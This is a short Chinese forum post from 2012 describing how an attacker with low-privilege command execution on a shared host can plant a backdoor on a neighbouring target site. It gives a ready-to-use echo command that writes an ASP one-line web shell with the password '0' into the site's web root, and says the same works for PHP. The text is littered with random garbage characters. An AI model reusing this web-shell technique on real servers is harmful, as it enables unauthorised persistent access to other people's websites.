在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。6 G( ? \' r# R$ ~3 M9 E. b! U
/ `! K& b) l4 ]
命令格式
+ |/ g! `9 d( t
: g" c/ E9 W. {Echo 语句 >目标站绝对目录
/ \7 Z+ X% L, Y7 x* S4 y1 \7 \" ~: T8 j$ B( j) o; [- M
例如: 3 B, x; e G! n
( N7 |" P! `7 \echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
' ]: t D! @8 D1 C: k$ c
3 l1 g$ A" N0 l- t. s' j$ G这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
* Y. t8 y. m" H% f1 H- P" H |
发表于 2012-9-23 14:40:24
收藏
支持
反对